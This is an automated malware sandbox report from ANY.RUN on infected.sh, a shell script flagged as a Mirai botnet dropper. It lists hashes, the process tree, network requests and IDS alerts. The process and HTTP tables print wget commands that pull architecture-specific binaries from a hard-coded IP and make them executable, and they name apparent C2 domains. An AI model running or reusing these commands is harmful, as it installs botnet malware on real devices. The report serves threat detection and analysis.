Malware analysis infected.sh Malicious activity | ANY.RUN

Add for printing

File name:	infected.sh
Full analysis:	https://app.any.run/tasks/90198e95-8b7b-4e0b-8ad9-bf31908f8207
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	February 13, 2025, 18:52:42
OS:	Ubuntu 22.04.2 LTS
Tags:	evasion auto botnet mirai
MIME:	text/plain
File info:	ASCII text
MD5:	386100ABFFFEA6047E4E7D3A350DE1A9
SHA1:	C8244E6C54578A05EB86E7FAFD6736D9415B343B
SHA256:	7A0D29462EC9548247FB10A6E2CCF36BCAEC52468002AB87A4685CB371963A31
SSDEEP:	6:SuUQA9WC+UQAXUW/+UQAEZW9wdUQMMUVSWtDaUQMoIpWs+UQDSWR:q06XP/lEozMqtDNeLlR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- MIRAI has been found (auto)
  - wget (PID: 38755)
  - wget (PID: 38770)
  - wget (PID: 38759)
  - wget (PID: 38777)
  - wget (PID: 38784)
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 38749)
- Executes commands using command-line interpreter
  - sudo (PID: 38752)
- Uses wget to download content
  - bash (PID: 38753)
- Checks for external IP
  - chode (PID: 38791)
- Potential Corporate Privacy Violation
  - wget (PID: 38788)
  - wget (PID: 38784)
  - wget (PID: 38755)
  - wget (PID: 38759)
  - wget (PID: 38770)
  - wget (PID: 38777)
- Connects to the server without a host name
  - wget (PID: 38784)
  - chode (PID: 38791)
  - wget (PID: 38788)
- Connects to unusual port
  - chode (PID: 38791)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

240

Monitored processes

32

Malicious processes

7

Suspicious processes

2

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
38748	/bin/sh -c "sudo chown user /tmp/infected\.sh && chmod +x /tmp/infected\.sh && DISPLAY=:0 sudo -iu user /tmp/infected\.sh "	/usr/bin/dash	—	any-guest-agent
User: user Integrity Level: UNKNOWN Exit code: 0
38749	sudo chown user /tmp/infected.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38750	chown user /tmp/infected.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
38751	chmod +x /tmp/infected.sh	/usr/bin/chmod	—	dash
User: user Integrity Level: UNKNOWN Exit code: 0
38752	sudo -iu user /tmp/infected.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38753	-bash --login -c \/tmp\/infected\.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
38754	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38755	wget http://66.63.187.69/arm6 -O -	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0
38756	chmod 777 chode	/usr/bin/chmod	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38757	-bash --login -c \/tmp\/infected\.sh	/usr/bin/bash	—	bash
User: user Integrity Level: UNKNOWN Exit code: 32256

Add for printing

Executable files

0

Suspicious files

1

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
38755	wget	/home/user/chode		binary
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

12

TCP/UDP connections

22

DNS requests

11

Threats

7

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
38759	wget	GET	200	66.63.187.69:80	http://66.63.187.69/arm5	unknown	—	—	unknown
—	—	GET	204	185.125.190.48:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
38755	wget	GET	200	66.63.187.69:80	http://66.63.187.69/arm6	unknown	—	—	unknown
38770	wget	GET	200	66.63.187.69:80	http://66.63.187.69/arm7	unknown	—	—	unknown
38791	chode	GET	200	173.231.16.77:80	http://api64.ipify.org/	unknown	—	—	malicious
38788	wget	GET	200	66.63.187.69:80	http://66.63.187.69/x86	unknown	—	—	unknown
38777	wget	GET	200	66.63.187.69:80	http://66.63.187.69/mips	unknown	—	—	unknown
38784	wget	GET	200	66.63.187.69:80	http://66.63.187.69/mpsl	unknown	—	—	unknown
38791	chode	GET	200	223.5.5.5:80	http://223.5.5.5/resolve?name=techsupport.anondns.net&type=1	unknown	—	—	unknown
38791	chode	GET	200	223.5.5.5:80	http://223.5.5.5/resolve?name=dvrhelper.anondns.net&type=1	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.190.17:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
—	—	185.125.190.48:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
—	—	212.102.56.178:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
38755	wget	66.63.187.69:80	—	QUADRANET-INTERNET-SERVICES	US	unknown
512	snapd	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
38759	wget	66.63.187.69:80	—	QUADRANET-INTERNET-SERVICES	US	unknown
38770	wget	66.63.187.69:80	—	QUADRANET-INTERNET-SERVICES	US	unknown
512	snapd	185.125.188.55:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
38777	wget	66.63.187.69:80	—	QUADRANET-INTERNET-SERVICES	US	unknown

DNS requests

Domain	IP	Reputation
connectivity-check.ubuntu.com	2001:67c:1562::23 2620:2d:4002:1::198 2620:2d:4002:1::196 2620:2d:4000:1::96 2620:2d:4000:1::22 2001:67c:1562::24 2620:2d:4002:1::197 2620:2d:4000:1::2b 2620:2d:4000:1::23 2620:2d:4000:1::97 2620:2d:4000:1::98 2620:2d:4000:1::2a 185.125.190.48 91.189.91.97 185.125.190.17 185.125.190.49 91.189.91.48 91.189.91.49 185.125.190.96 185.125.190.98 185.125.190.97 91.189.91.98 91.189.91.96 185.125.190.18	whitelisted
google.com	216.58.206.78 2a00:1450:4001:81d::200e	whitelisted
odrs.gnome.org	212.102.56.178 195.181.170.19 169.150.255.184 195.181.175.40 37.19.194.80 207.211.211.26 169.150.255.180 2a02:6ea0:c700::21 2a02:6ea0:c700::101 2a02:6ea0:c700::18 2a02:6ea0:c700::19 2a02:6ea0:c700::11 2a02:6ea0:c700::112 2a02:6ea0:c700::107	whitelisted
api.snapcraft.io	185.125.188.54 185.125.188.55 185.125.188.58 185.125.188.59 2620:2d:4000:1010::2e6 2620:2d:4000:1010::6d 2620:2d:4000:1010::42 2620:2d:4000:1010::117	whitelisted
212.100.168.192.in-addr.arpa	—	unknown

Threats

PID	Process	Class	Message
38755	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
38759	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
38770	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
38777	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
38784	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
38788	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
38791	chode	Device Retrieving External IP Address Detected	SUSPICIOUS [ANY.RUN] An IP address was received from the server as a result of an HTTP request

Add for printing

No debug info

General Info

infected.sh

386100ABFFFEA6047E4E7D3A350DE1A9

C8244E6C54578A05EB86E7FAFD6736D9415B343B

7A0D29462EC9548247FB10A6E2CCF36BCAEC52468002AB87A4685CB371963A31

6:SuUQA9WC+UQAXUW/+UQAEZW9wdUQMMUVSWtDaUQMoIpWs+UQDSWR:q06XP/lEozMqtDNeLlR

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MIRAI has been found (auto)

SUSPICIOUS

Modifies file or directory owner

Executes commands using command-line interpreter

Uses wget to download content

Checks for external IP

Potential Corporate Privacy Violation

Connects to the server without a host name

Connects to unusual port

INFO

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings